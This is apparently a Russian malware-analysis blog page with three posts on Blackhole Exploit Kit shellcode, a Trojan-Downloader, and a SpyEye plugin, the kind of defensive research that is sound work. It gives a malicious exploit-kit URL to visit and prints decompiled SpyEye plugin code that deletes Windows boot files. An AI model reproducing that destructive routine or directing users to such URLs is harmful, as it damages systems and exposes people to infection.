четверг, 19 апреля 2012 г.

Анализ шеллкода из Blackhole Exploit Kit

Допустим у нас есть задача быстро просмотреть что и откуда будет грузиться из Blackhole exploit kit. Можно конечно воспользоваться одной из виртуальных машин + wireshark (влепите сюда ваш любимый снифер), но это не интересно =) Вот такой я извращенец. =) Проведем эдакий ручной анализ, или х. его знает как хотите так и называйте.

Нам нужен свеженький семпл, идем на http://www.malwaredomainlist.com/mdl.php , выбираем, благо есть из чего, BEK оченна популярен сейчас у бед гайс и криминал кидс =)
Наш выбор пал на rf3c73.ru/indexi.php?pagexxi=677684c604189845

Ну и ладушки, отключаем в браузере javascript (кто в танке , может не делать этого), заходим по линку, дожидаемся пока страничка загрузиться и сохраняем исходный код страницы.




не обращаем внимания на этот ужасный мусор, то что нам нужно находиться в самом конце кода, заменям строчку w(b) на document.write(b) и сохраняем файл. На картинке спецально выделил , мало ли чо =)

вторник, 10 апреля 2012 г.

Анализ Trojan-Downloader.Win32.Small.cgwk

Попался тут где то в середине марта экземпляр на Malware Domaian List  троян доунлоадер. Ну что ж поиследуем решил , на момент поимки его на вирустотале детектило 4 или 5 АВ. к концу марта уже 35/45 (линк).


Код доунлоадера разбавлен полиморфным мусором, что несколько затрудняет анализ. Имеем следующую картину



Можно забить и анализировать так, благо кода всетаки не так много, но лень двигатель прогресса и для облегчения своей задачи воспользуемся прекрасным плагином для IdaPro - CodeDoctor (взять тут http://tuts4you.com). Ок. имеем следующую картину:


И это уже гораздо приятней =)

суббота, 17 сентября 2011 г.

Часть 2: SpyEye и plugin.dll




Наверняка разработка этого плагина велась под лозунгом: "Не наврежу, но нагажу" =) Особо тут смотреть не на что, но да все равно








MD5: 20f73f9765e592960f3f373788560ce4
SHA1: bf4e2c0f858210f3a4fcd74034bf87d1fefb915a
SHA256: ee8afff4b7d8cb851fc893c1913bfe56b89c11864be6faad561ae7947cf7bff6
signed int __cdecl Start()
{
  unsigned int index; // edi@1
  const CHAR *fName; // esi@2
  LPCSTR filesTable; // [sp+8h] [bp-18h]@1
  int v4; // [sp+Ch] [bp-14h]@1
  int v5; // [sp+10h] [bp-10h]@1
  int v6; // [sp+14h] [bp-Ch]@1
  int v7; // [sp+18h] [bp-8h]@1
  int v8; // [sp+1Ch] [bp-4h]@1

  filesTable = "c:\\ntldr";
  v4 = (int)"c:\\ntdetect.com";
  v5 = (int)"c:\\bootmgr";
  v6 = (int)"c:\\loadmgr";
  v7 = (int)"c:\\windows\\explorer.exe";
  v8 = (int)"c:\\osloader.exe";
  index = 0;
  do
  {
    fName = (&filesTable)[4 * index];
    SetFileAttributesA((&filesTable)[4 * index], FILE_ATTRIBUTE_NORMAL);
    DeleteFileA(fName);
    MoveFileExA(fName, "c:\\boots", 4u);
    ++index;
  }
  while ( index < 6 );
  return 1;
}

Плагин тупо пытается уничтожить файло чтобы нарушить нормальную работу OS